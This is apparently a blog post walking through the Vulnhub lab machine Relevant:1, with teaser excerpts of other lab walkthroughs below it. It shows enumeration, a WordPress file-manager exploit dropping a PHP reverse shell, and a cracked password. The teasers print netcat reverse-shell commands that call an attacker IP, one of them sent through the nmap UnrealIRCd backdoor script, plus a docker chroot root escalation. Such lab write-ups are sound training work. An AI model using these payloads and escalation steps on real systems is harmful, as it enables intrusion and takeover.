Relevant:1 - Walkthrough [Vulnhub]

Here's my solution for Relevant:1.
The machine can be downloaded from here.

Nmap
Scanning for all TCP ports.
$ nmap -sC -sV -p- 192.168.1.109


We find 2 port open.

Enumeration
Browsing website, the web page presents us with 3 links, seems some kind of hints, lets check it out.

Browsing the 1st link- https://rb.gy/g5prrv, gets redirect to youtube.

Browsing the 2nd link- https://pastebin.com/sGzQSQXu, seems like a list of credentials.

Just a thought, the home page says- because we hax0r3d your webz!, meaning the hacker has compromised the website.
So, may be they have leaked the credentials here.


Tried brute forcing the ssh but no result.

Browsing the 3rd link- https://ibb.co/JtTY0Md, the QR code.


 
We can browse Zxing, and decode it. 

Interesting, we keep it we may require at further stages.

Lets scan for directories.
$ dirb -u http://192.168.1.109 -r


Seems like the website is built on CMS- Wordpress. We can use wpscan to enumerate it further.
$ wpscan --url http://192.168.1.109 -e ap,u

The wpscan did not recognize the wordpress so we rescan using- force flag.
$ wpscan --url http://192.168.1.109 --force -e ap,u

Still not useful result, now we change the detection mode to- aggressive.
$ wpscan --url http://192.168.1.109 --force --plugins-detection aggressive


We search the exploit for plugin- wp-file-manager and found it here. 

Getting Access
After downloading the exploit we run it.


 
The exploits requires a file- payload.php where we place the php reverse shell payload.



Now to execute the payload we browse- http://192.168.1.109/wp-content/plugins/wp-file-manager/lib/files/payload.php
And on the other hand we start the netcat listener.




We get the reverse shell.

Privilege Escalation
From www-data>news

We find an interesting directory with name- ... (Triple Dots, very confusing name), under /home/h4x0r, let us navigate to it.


A note, let us see what's in it.

Looks like a credential. We verify by checking the /etc/passwd file, the user- news is present.

 

The password seems to be in hash.



We can browse Crackstation for cracking the hash.


Lets switch to user- news.
$ su news
Password: backdoorlover


From news>root
We check for SUDO rights.

 

Lets escalate and get the root flag.



Comments

Post a Comment

Popular posts from this blog

Sunset:Noontide - Walkthrough [Vulnhub]

Image
Here's my solution for Sunset:Noontide. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.109 We find 3 ports (UnrealIRCd) open. Enumeration We search the exploit for UnrealIRCd and we find it here.     Getting Access To exploit we simply run the nmap command with the reverse shell payload and on the other hand we start the netcat listener. $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 192.168.1.108 1234' 192.168.1.109 We get the reverse shell. User Flag. Privilege Escalation We find that user- root has the default password- root. Lets switch to user- root and get the root flag. $ su root Password: root  
Read more

CyberSploit:2 - Walkthrough [Vulnhub]

Image
Here's my solution for CyberSploit:2. The Machine can be downloaded from here Nmap Starting with nmap scanning for all TCP open ports. nmap -sC -sV -p- 192.168.1.103 We find only 2 open ports. Enumeration Browsing the website, show list of usernames and passwords. Checking the source code reveal us a hint- ROT47. While browsing the website, we see a strange username- D92:=6?5C2 and its associated password as- 4J36CDA=@:E` From the hint we can guess that the username and password can be ROT47 encoded. Browsed Decode.fr to decode it, and we get the credentials as- username: shailendra password: cybersploit1 Getting Access Tried ssh with credential, and we get the access. ssh shailendra@192.168.1.1 password: cybersploit1 Found a file named as hint.txt, which gives a hint as docker, it can be used for privilege escalation, also the user is a member of docker group. Privilege Escalation docker run -v /:/mnt --rm -it alpine chroot /mnt sh And we get the flag
Read more

BBS(cute):1.0.1 - Walkthrough [Vulnhub]

Image
Here's my solution for BBS(cute):1.0.1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.111 We find 5 ports open. Enumeration Browsing the web hosted on port 80 (Default HTTP Port). We do not find any useful information lets run the dirb for scanning directories. $ dirb http://192.168.1.111 -r Browsing /index.php We see that it is built on CMS- CuteNews and its version 2.1.2 We search for the exploit and found it here.   Lets get this exploit. Getting Access But before running the exploit we need to make some changes. We remove all /CuteNews from the exploit code, in order to run it successfully. Done with the changes, now we run the exploit. $ python3 48800.py We provide the required information that is, the URL and hit enter. The commands are running fine, but we are not able to navigate to different directories, hence we try to get the normal reverse shell. We see netcat is present, we enter the payload. $ nc -e /bin/bash 19...
Read more